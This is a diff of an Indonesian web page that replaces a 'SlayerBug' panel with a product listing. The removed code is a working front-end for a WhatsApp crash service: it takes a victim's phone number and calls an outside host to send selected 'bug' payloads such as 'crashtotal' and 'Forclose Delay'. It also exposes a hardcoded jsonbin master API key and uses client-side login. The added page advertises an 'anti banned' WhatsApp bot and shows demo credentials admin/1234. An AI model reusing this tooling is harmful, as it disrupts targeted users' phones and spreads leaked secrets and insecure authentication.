--- a/index.html
+++ b/index.html
@@ -1,326 +1,156 @@
 <!DOCTYPE html>
-<html lang="en">
+<html lang="id">
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Web Bug Slayer</title>
+  <title>Produk - HanzyyOffc</title>
   <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@600&display=swap" rel="stylesheet">
   <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">
   <style>
-    :root { --main: #ffffff; --second: #cccccc; --bg: #0e0e0e; --text: #eeeeee; }
-    * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Orbitron', sans-serif; }
+    :root {
+      --main: #ffffff; --second: #cccccc;
+      --bg: #0e0e0e; --text: #eeeeee;
+      --primary: #00ffcc;
+    }
+    * {
+      margin: 0; padding: 0;
+      box-sizing: border-box;
+      font-family: 'Orbitron', sans-serif;
+    }
     body {
       background: var(--bg); color: var(--text);
-      min-height: 100vh; display: flex;
-      justify-content: center; align-items: center;
-      padding: 20px; position: relative;
+      min-height: 100vh; padding: 20px;
     }
-    #particles-js { position: fixed; width: 100%; height: 100%; z-index: 0; }
+    .container {
+      max-width: 1200px; margin: 0 auto;
+    }
     .glass-box {
-      background: rgba(255, 255, 255, 0.05);
-      border: 1px solid rgba(255, 255, 255, 0.1);
+      background: rgba(255,255,255,0.05);
+      border: 1px solid rgba(255,255,255,0.1);
       border-radius: 20px;
-      padding: 30px; backdrop-filter: blur(10px);
-      box-shadow: 0 0 25px rgba(255, 255, 255, 0.2);
-      z-index: 2; max-width: 450px; width: 100%;
+      padding: 30px;
+      backdrop-filter: blur(10px);
+      box-shadow: 0 0 25px rgba(255,255,255,0.2);
+      margin-bottom: 40px;
     }
-    .profile { display: flex; align-items: center; gap: 15px; margin-bottom: 25px; }
-    .profile img { width: 65px; height: 65px; border-radius: 50%; border: 2px solid var(--main); }
-    .profile-info h2 { font-size: 1.2rem; color: var(--main); }
-    .status { font-size: 0.9rem; color: #bbbbbb; }
-    .status i { color: #ffffff; margin-right: 5px; }
-    h1 { font-size: 1.4rem; color: var(--main); margin-bottom: 20px; text-align: center; animation: neon 2s infinite alternate; }
-    .neon {
-      color: #0ff;
-      text-shadow: 0 0 5px #0ff, 0 0 10px #0ff, 0 0 20px #0ff;
-      animation: flicker 1.5s infinite alternate;
+    h1.title {
+      font-size: 2rem;
+      text-align: center;
+      color: var(--main);
+      margin-bottom: 20px;
     }
-    @keyframes flicker {
-      0%, 19%, 21%, 23%, 25%, 54%, 56%, 100% { opacity: 1; }
-      20%, 24%, 55% { opacity: 0.4; }
+    .product-grid {
+      display: grid;
+      grid-template-columns: repeat(auto-fill, minmax(250px, 1fr));
+      gap: 20px;
     }
-    @keyframes neon {
-      from { text-shadow: 0 0 10px var(--main); }
-      to { text-shadow: 0 0 25px var(--second); }
+    .product-card {
+      background: rgba(255,255,255,0.07);
+      border-radius: 15px;
+      padding: 20px;
+      text-align: center;
+      transition: 0.3s;
+      border: 1px solid rgba(255,255,255,0.1);
+    }
+    .product-card:hover {
+      transform: scale(1.05);
+      background: rgba(255,255,255,0.12);
+    }
+    .product-card h2 {
+      font-size: 1.2rem;
+      margin: 10px 0;
+      color: var(--primary);
+    }
+    .product-card p {
+      font-size: 0.9rem;
+      color: #ccc;
+    }
+    .product-card button {
+      margin-top: 10px;
+      background: linear-gradient(135deg, var(--main), var(--second));
+      color: #000;
+      padding: 10px 20px;
+      border: none;
+      border-radius: 30px;
+      cursor: pointer;
+      box-shadow: 0 0 10px var(--main);
+      font-size: 0.9rem;
+    }
+    .login-box {
+      max-width: 400px;
+      margin: 0 auto;
     }
     input {
-      background: rgba(255, 255, 255, 0.05);
-      color: white;
-      border: 1px solid rgba(255, 255, 255, 0.1);
-      border-radius: 12px;
-      padding: 12px;
       width: 100%;
+      padding: 12px;
+      background: rgba(255,255,255,0.05);
+      color: #fff;
+      border: 1px solid rgba(255,255,255,0.1);
+      border-radius: 10px;
       margin-bottom: 10px;
-      transition: 0.3s;
     }
     input:focus {
-      outline: none; border: 1px solid var(--main);
-      background: rgba(255, 255, 255, 0.1);
+      outline: none;
+      background: rgba(255,255,255,0.1);
+      border: 1px solid var(--main);
     }
-    .bug-options { display: flex; flex-direction: column; gap: 10px; margin-bottom: 20px; }
-    .bug-card {
-      background: rgba(255, 255, 255, 0.05);
-      border: 1px solid rgba(255, 255, 255, 0.1);
-      border-radius: 15px;
-      padding: 12px 20px;
-      display: flex; align-items: center;
-      gap: 10px; cursor: pointer; transition: 0.3s;
-    }
-    .bug-card i { font-size: 1.2rem; color: #ffffff; }
-    .bug-card span { font-size: 1rem; color: white; }
-    .bug-card:hover { background: rgba(255, 255, 255, 0.1); transform: scale(1.03); }
-    .bug-card.active { border: 2px solid var(--main); box-shadow: 0 0 12px var(--main); }
-    button {
+    .btn-login {
+      width: 100%;
+      padding: 12px;
       background: linear-gradient(135deg, var(--main), var(--second));
       border: none;
-      color: black;
-      width: 100%;
-      padding: 14px;
-      border-radius: 50px;
+      border-radius: 30px;
+      color: #000;
       font-size: 1rem;
       cursor: pointer;
-      display: flex;
-      align-items: center;
-      justify-content: center;
-      gap: 10px;
-      box-shadow: 0 0 15px var(--main);
-      transition: 0.3s;
-      margin-top: 10px;
+      box-shadow: 0 0 10px var(--main);
     }
-    .small-logout {
-      background: rgba(255, 255, 255, 0.1);
-      border: 1px solid var(--main);
-      color: var(--main);
-      font-size: 0.85rem;
-      padding: 8px 16px;
-      border-radius: 12px;
-      margin-top: 10px;
-      cursor: pointer;
-      transition: 0.3s;
-      width: fit-content;
-      display: block;
-      margin-left: auto;
-      margin-right: auto;
-    }
-    .small-logout:hover {
-      background: rgba(255, 255, 255, 0.2);
-    }
-    #popup {
-      position: fixed;
-      top: 0; left: 0; width: 100%; height: 100%;
-      background: rgba(0, 0, 0, 0.6);
-      display: flex; justify-content: center; align-items: center;
-      z-index: 999;
-    }
-    .popup-content {
-      background: #1a1a1a;
-      color: #00ff88;
-      padding: 30px;
-      border-radius: 15px;
+    .demo-info {
       text-align: center;
-      max-width: 90%;
-      box-shadow: 0 0 20px #00ff88;
-      animation: fadeIn 0.3s ease-in-out;
-      position: relative;
+      margin-top: 15px;
+      font-size: 0.85rem;
+      color: #aaa;
     }
-    .popup-content .close-btn {
-      position: absolute;
-      top: 10px; right: 15px;
-      font-size: 1.5rem;
-      color: #ff4d4d;
-      cursor: pointer;
-    }
-    @keyframes fadeIn {
-      from { opacity: 0; transform: scale(0.9); }
-      to { opacity: 1; transform: scale(1); }
+    .demo-info code {
+      color: #00ffcc;
     }
   </style>
 </head>
 <body>
-<div id="particles-js"></div>
-<div id="popup" style="display:none;">
-  <div class="popup-content">
-    <span class="close-btn" onclick="closePopup()">&times;</span>
-    <p id="popup-message"></p>
+<div class="container">
+  <div class="glass-box login-box">
+    <h1 class="title">Login Admin</h1>
+    <input type="text" placeholder="Username" />
+    <input type="password" placeholder="Password" />
+    <button class="btn-login"><i class="fas fa-sign-in-alt"></i> Login</button>
+    <div class="demo-info">
+      <p><strong>Demo Login:</strong></p>
+      <p>👤 Username: <code>admin</code></p>
+      <p>🔒 Password: <code>1234</code></p>
+    </div>
+  </div>
+
+  <div class="glass-box">
+    <h1 class="title">Daftar Produk</h1>
+    <div class="product-grid">
+      <div class="product-card">
+        <h2>Script WhatsApp Bot</h2>
+        <p>Bot WhatsApp full fitur anti banned & UI modern.</p>
+        <button>🔍 Detail</button>
+      </div>
+      <div class="product-card">
+        <h2>Obfuscator JS</h2>
+        <p>Lindungi script JS kamu dari pembajakan.</p>
+        <button>🔍 Detail</button>
+      </div>
+      <div class="product-card">
+        <h2>Script Telegram Auto</h2>
+        <p>Auto-reply, auto-order, dan manajemen pelanggan.</p>
+        <button>🔍 Detail</button>
+      </div>
+      <!-- Tambahkan produk lainnya di sini -->
+    </div>
   </div>
 </div>
-
-<div id="login-box" class="glass-box">
-  <h1>Login</h1>
-  <input type="text" id="username" placeholder="Username" />
-  <input type="password" id="password" placeholder="Password" />
-  <button onclick="login()"><i class="fas fa-sign-in-alt"></i> Login</button>
-  <div id="login-result" style="margin-top:10px; text-align:center;"></div>
-
-  <!-- Demo Login Info -->
-  <div style="margin-top:20px; font-size:0.9rem; color:#aaa; text-align:center;">
-    <p><strong>Demo Login:</strong></p>
-    <p>👤 Username: <code>admin</code></p>
-    <p>🔒 Password: <code>1234</code></p>
-  </div>
-</div>
-
-<div class="glass-box" id="main-box" style="display:none;">
-  <div class="profile">
-    <img src="https://files.catbox.moe/ktuerk.jpg" alt="profile">
-    <div class="profile-info">
-      <h2 id="userLabel">Api Bug</h2>
-      <span class="status"><i class="fas fa-circle"></i> Connected</span>
-    </div>
-  </div>
-  <h1 class="neon"><i class="fab fa-whatsapp"></i> SlayerBug</h1>
-  <input type="text" id="target" placeholder="628xxxx" />
-  <div class="bug-options">
-    <div class="bug-card active" data-bug="crashtotal">
-      <i class="fas fa-skull-crossbones"></i><span>FC Invisible</span>
-    </div>
-    <div class="bug-card" data-bug="fc">
-      <i class="fas fa-bomb"></i><span>kontol WA</span>
-    </div>
-    <div class="bug-card" data-bug="delay">
-      <i class="fas fa-clock"></i><span>Forclose Delay</span>
-    </div>
-    <div class="bug-card" data-bug="blank">
-      <i class="fas fa-eye-slash"></i><span>WhatsApp</span>
-    </div>
-  </div>
-  <button id="sendBtn" onclick="sendBug()"><i class="fas fa-bug"></i> Kirim Bug</button>
-  <button class="small-logout" onclick="logout()">Logout</button>
-
-  <div id="result" style="margin-top:10px;"></div>
-  <div class="contact" style="margin-top: 20px; color: white;">
-    <p>Contact Developer:</p>
-    <a href="https://t.me/XyHanzyy" target="_blank" style="color: #00acee; text-decoration: none;">
-      <i class="fab fa-telegram"></i> @XyHanzyyOffc
-    </a>
-  </div>
-</div>
-
-<script src="https://cdn.jsdelivr.net/npm/particles.js@2.0.0/particles.min.js"></script>
-<script>
-particlesJS("particles-js", {
-  particles: {
-    number: { value: 60, density: { enable: true, value_area: 800 }},
-    color: { value: "#ffffff" },
-    shape: { type: "circle" },
-    opacity: { value: 0.4 },
-    size: { value: 3, random: true },
-    line_linked: {
-      enable: true, distance: 150,
-      color: "#ffffff", opacity: 0.3, width: 1
-    },
-    move: { enable: true, speed: 2, direction: "none", random: false }
-  },
-  interactivity: {
-    events: {
-      onhover: { enable: true, mode: "grab" },
-      onclick: { enable: false }
-    },
-    modes: { grab: { distance: 200, line_linked: { opacity: 1 } } }
-  },
-  retina_detect: true
-});
-
-const BIN_ID = "686ba9fa8a456b7966bcc574";
-const API_KEY = "$2a$10$MPw.J50xKE.i.HBKKPWYieKzmUQYvM/4hLOy3cYHSFcVEL8Yo08W";
-const headers = {
-  "Content-Type": "application/json",
-  "X-Master-Key": API_KEY
-};
-
-async function getUsers() {
-  const res = await fetch(`https://api.jsonbin.io/v3/b/${BIN_ID}/latest`, { headers });
-  const data = await res.json();
-  return data.record;
-}
-
-function logout() {
-  sessionStorage.removeItem("currentUser");
-  location.reload();
-}
-
-function saveSession(user) {
-  sessionStorage.setItem("currentUser", JSON.stringify(user));
-}
-
-function getSession() {
-  return JSON.parse(sessionStorage.getItem("currentUser"));
-}
-
-window.onload = async () => {
-  const user = getSession();
-  if (user) showDashboard(user);
-};
-
-function showPopup(message) {
-  document.getElementById("popup-message").innerHTML = message;
-  document.getElementById("popup").style.display = "flex";
-}
-
-function closePopup() {
-  document.getElementById("popup").style.display = "none";
-}
-
-async function login() {
-  const user = document.getElementById("username").value.trim();
-  const pass = document.getElementById("password").value.trim();
-  const result = document.getElementById("login-result");
-  const users = await getUsers();
-  const found = users.find(u => u.username === user && u.password === pass);
-
-  if (found) {
-    saveSession(found);
-    showDashboard(found);
-  } else {
-    result.innerText = "❌ Username atau Password salah!";
-    result.style.color = "crimson";
-  }
-}
-
-function showDashboard(user) {
-  document.getElementById("login-box").style.display = "none";
-  document.getElementById("main-box").style.display = "block";
-  document.getElementById("userLabel").innerText = user.username;
-}
-
-let selectedBug = "crashtotal";
-document.querySelectorAll(".bug-card").forEach(card => {
-  card.addEventListener("click", () => {
-    document.querySelectorAll(".bug-card").forEach(c => c.classList.remove("active"));
-    card.classList.add("active");
-    selectedBug = card.getAttribute("data-bug");
-  });
-});
-
-async function sendBug() {
-  const input = document.getElementById("target").value.trim();
-  const resDiv = document.getElementById("result");
-  const btn = document.getElementById("sendBtn");
-
-  if (!/^\d+(@s\.whatsapp\.net)?$/.test(input)) {
-    resDiv.innerText = "Masukkan nomor WA yang valid!";
-    resDiv.style.color = "crimson";
-    return;
-  }
-
-  const chatId = input.includes("@s.whatsapp.net") ? input : `${input}@s.whatsapp.net`;
-  btn.disabled = true;
-  const originalHTML = btn.innerHTML;
-  btn.innerHTML = '<span class="spinner"></span> Mengirim...';
-  resDiv.innerText = "";
-
-  try {
-    const res = await fetch(`https://cella-saja.mydigital-store.me/permen?chatId=${encodeURIComponent(chatId)}&type=${selectedBug}`);
-    const json = await res.json();
-    showPopup(`Apocalypse Bug successfully sent to <b>${input}</b>`);
-  } catch (err) {
-    resDiv.innerText = "❌ Gagal fetch: " + err;
-    resDiv.style.color = "crimson";
-  }
-
-  btn.disabled = false;
-  btn.innerHTML = originalHTML;
-}
-</script>
 </body>
 </html>
